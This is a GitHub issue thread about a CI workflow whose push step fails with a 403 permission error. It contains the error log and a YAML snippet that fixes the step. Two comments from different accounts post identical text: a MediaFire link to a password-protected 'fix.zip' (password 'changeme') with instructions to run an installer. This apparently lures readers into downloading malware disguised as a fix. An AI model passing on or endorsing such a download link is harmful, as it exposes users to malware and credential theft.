### ISSUE TITLE
Github action unable to access requested URL

### ISSUE THREAD

**Issue by SodaVolcano** [zazwaz12/CITS3200---National-Housing-Simulation#50]
Yo what is dis happened on #49 

![image](https://github.com/user-attachments/assets/81822593-2fbc-4c02-9c35-4602a1922127)

```
Run ad-m/github-push-action@master
Push to branch issue-44-potentially-refactor-nhs-utils-functions
remote: Permission to zazwaz12/CITS3200---National-Housing-Simulation.git denied to github-actions[bot].
fatal: unable to access 'https://github.com/zazwaz12/CITS3200---National-Housing-Simulation.git/': The requested URL returned error: 403
Error: Invalid exit code: 128
    at ChildProcess.<anonymous> (/home/runner/work/_actions/ad-m/github-push-action/master/start.js:30:21)
    at ChildProcess.emit (node:events:5[19](https://github.com/zazwaz12/CITS3200---National-Housing-Simulation/actions/runs/10557924110/job/29246419642?pr=49#step:11:20):28)
    at maybeClose (node:internal/child_process:1105:16)
    at ChildProcess._handle.onexit (node:internal/child_process:305:5) {
  code: 128
}
```

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SodaVolcano** [comment]
@ctmes have a look at what's different about the current yaml file and the yaml file below (from another of my project)

```yaml
- name: Check for modified files
              id: git-check
              run: echo "modified=$(if git diff-index --quiet HEAD --; then echo "false"; else echo "true"; fi)" >> $GITHUB_OUTPUT

            - name: Push changes
              if: steps.git-check.outputs.modified == 'true'
              run:
                  git config --global user.name ${{ github.actor }} &&  git config --global user.email ${{ github.actor }}@users.noreply.github.com && git add . && git commit -m "Automated changes" && git push

```
